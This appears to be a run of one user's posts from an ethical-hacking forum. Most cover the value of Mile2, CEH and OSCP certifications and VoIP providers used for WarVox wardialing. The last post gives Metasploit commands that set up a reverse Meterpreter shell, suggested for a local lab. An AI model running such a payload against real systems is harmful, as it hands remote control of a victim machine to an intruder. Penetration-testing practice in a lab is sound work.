This is probably the closest you're going to get...

On the left side, in your 'personal box' thing, there's a link to 'Recent Posts' that will pull them up for you. I usually open the ones I want to read in a new tab then then 'mark all as read.' Start on the last page and work backwards if you go that route.

Should be correct. The objectives have changed little, if at all.

FYI for anyone else that may have this thinking...

I don't particularly have any interest in Mile2, their products, or certifications, or think any of it is worthwhile at the moment.

Shots fired!

Care to elaborate?

Haha! I guess when you pull it from the rest of the context that was with it, it does sound kind of evil. The FYI was more for the second part of that post. The part you've referenced was on a personal level. They were nice about the mix-up and refunded my money with no problems. They've also offered to add my choice of CBT to my account per the giveaway.

I don't have anything particularly against Mile2. I just don't see value in their certifications in the field at the moment. The knowledge learned from the course may certainly be worth something but I don't feel any of it will add anything to my qualifications or really be beneficial to me.

I'd much rather see this go to someone who can use it to advance their career or gain knowledge from the course. I never had them add a CBT to my account so there's no reason someone else can't have this - would hate to see it go unused.

For anyone that hasn't turned their scorecard in yet, I'm compiling the information together. If you have anything filled out, please send it over. Thanks!

Hmm, that's odd considering EH-Net is hosted with 1&1 isn't it Don?

I thought maybe I'd check out the CPTConsultant but it's only offered as a $450 self-study kit. Figured this is well under $800 for the CBT + exam (plus I had to pay shipping costs). I was successful in completing the order with the voucher but they emailed me back saying I couldn't get it.

So, now I'm just waiting for my refund Roll Eyes

Haha, of course Smiley

For reference, I used VoicePulse as my VoIP provider for this engagement.

The service and setup with their part went smoothly and I was happy with the cost per call ($0.011/minute). I didn't have any problems with their service and would recommend it (if you have the time to setup an Asterisk server, or already have one).

The only downside is that they require a $10 monthly minimum usage and a $2.95 monthly regulatory fee. The entire cost to use what I needed for my engagement was well under $10. This just means I had to cancel my account and would have to go through their setup process again to use their service the next time.

While I didn't use it for this engagement, an alternative (and probably easier option) is Vitelity. They still support direct IAX2 connections but you will need to call in to their customer support and let them know you need this capability so they can flag your account for IAX2 use. I believe their cost per minute is similar (and my guess is they have the same regulatory fee but I don't know about any minimums). The only difference is you can use WarVox directly with their service rather than having to setup an Asterisk service (like I said, much easier).

Enjoy Smiley

CEH may not be OSCP, but it's not supposed to be.

Despite how it may be marketed... Grin But marketing is a different subject Wink

I've been looking at the course list at Mile2. Does anyone know how these compare with EC-Council's certifications? Is Mile2's CPEH similar to CEH?

There have been a couple posts here and there regarding this topic if you search the forums.

If there isn't a good, solid comparison out there yet, I'm pretty sure you can expect several coming soon given this giveway!

Thanks, Don! Great prize! And congrats to all the winners!

I'd probably disagree with that. While I'm not going to say the CEH was what got me to where I am today, it certainly had it's part and helped.

For example, in my first IT position earning the CEH helped me get security-related tasks at work. That in turn meant experience. That experience along with a few other certifications intrigued the hiring manager for a different position (a position I was offered, doubling my salary).

I've said it before, and I know others have as well, but it's not just getting the certificate that helps you. It's what you do with it and how you build upon it. That probably holds true for most of the certifications out there.

They are entirely different certifications. What do you want to do and what do you want to get out of the certification/course?

separate tests = separate charges Wink

Some clients choose to do it, some don't.

As previously mentioned we don't know your environment, or your target for that matter.

If it's within a local lab environment, targeting a Windows system, give the reverse meterpreter a try...

set payload windows/meterpreter/reverse_tcp
set lhost <your ip>
set lport 8888
exploit
